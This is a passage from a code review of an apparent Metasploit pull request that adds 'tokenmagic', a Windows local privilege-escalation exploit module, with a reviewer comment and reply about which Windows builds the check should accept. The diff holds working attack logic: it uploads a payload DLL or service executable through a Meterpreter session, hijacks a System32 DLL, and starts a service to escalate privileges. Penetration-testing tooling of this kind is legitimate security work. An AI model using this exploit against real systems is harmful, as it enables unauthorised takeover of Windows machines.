modules/exploits/windows/local/tokenmagic.rb

```diff
@@ -0,0 +1,226 @@
+      service_name = Rex::Text.rand_text_alpha(5..9).to_s
+    else
+      service_name = datastore['SERVICE_NAME']
+    end
+    if datastore['WRITABLE_DIR'].nil? || datastore['WRITABLE_DIR'].empty?
+      writable_dir = session.sys.config.getenv('TEMP').to_s
+    else
+      writable_dir = datastore['WRITABLE_DIR']
+    end
+
+    # Not sure how we want to format the module to account for both service and dll exploit methods, some duplicate code here
+    if datastore['METHOD'] == 'DLL'
+      bin_path = "#{writable_dir}\\WindowsCoreDeviceInfo.dll"
+      payload_dll = generate_payload_dll
+      print_status("Payload DLL is #{payload_dll.length} bytes long")
+      client.core.use('powershell') if !client.ext.aliases.include?('powershell')
+
+      # Check target
+      vprint_status('Checking Target')
+      validate_active_host
+      validate_payload
+
+      # Upload the payload
+      print_status("Uploading payload to #{bin_path}")
+      write_file(bin_path, payload_dll)
+      register_file_for_cleanup(bin_path)
+      register_file_for_cleanup('C:\\Windows\\System32\\WindowsCoreDeviceInfo.dll') # Register this file for cleanup so that if we fail, then the file is cleaned up.
+      # Run the exploit
+      _output = start_dll_hijack(bin_path, cmd_path)
+      return
+    end
+
+    bin_path = "#{writable_dir}\\#{service_filename}"
+    client.core.use('powershell') if !client.ext.aliases.include?('powershell')
+    payload_exe = generate_payload_exe_service({ servicename: service_name, arch: payload_arch })
+
+    # Debug info
+    vprint_status("Service Name = #{service_name}")
+    # Check target
+    vprint_status('Checking Target')
+    validate_active_host
+    validate_payload
+
+    # Upload the payload
+    print_status("Uploading payload to #{bin_path}")
+    write_file(bin_path, payload_exe)
+    register_file_for_cleanup(bin_path)
+
+    # Run the exploit
+    _output = start_service(service_name, bin_path, cmd_path)
+    sleep(5) # make sure exploit is finished- yes, this is suboptimal
+  end
+
+  def validate_active_host
+    begin
+      print_status("Attempting to PrivEsc on #{sysinfo['Computer']} via session ID: #{datastore['SESSION']}")
+    rescue Rex::Post::Meterpreter::RequestError => e
+      elog('Could not connect to session', error: e)
+      raise Msf::Exploit::Failed, 'Could not connect to session'
+    end
+  end
+
+  def validate_payload
+    vprint_status("Target Arch = #{sysinfo['Architecture']}")
+    vprint_status("Payload Arch = #{payload.arch.first}")
+    unless payload.arch.first == sysinfo['Architecture']
+      fail_with(Failure::BadConfig, 'Payload arch must match target arch')
+    end
+  end
+
+  def check
+    # This should be Windows 7sp0-Win10_1809
+    sysinfo_value = sysinfo['OS']
+    build_num = sysinfo_value.match(/\w+\d+\w+(\d+)/)[0].to_i
+    vprint_status("Build Number = #{build_num}")
+    return Exploit::CheckCode::Appears if sysinfo_value =~ /10/ && build_num <= 18362
```

Comment:
I haven't tested this but the comment makes it sound like this should work on Windows 7 but the check appears to require Windows 10 build <= 16362. If Windows 7 is vulnerable then this should still return `CheckCode::Appears` but if the DLL technique leveraged means that our module only works on Windows 10 then the module should fail with `Failure::NoTarget`.

Reply:
Yup; we need to figure out the check method; the service method should work with Win 7-10_1703.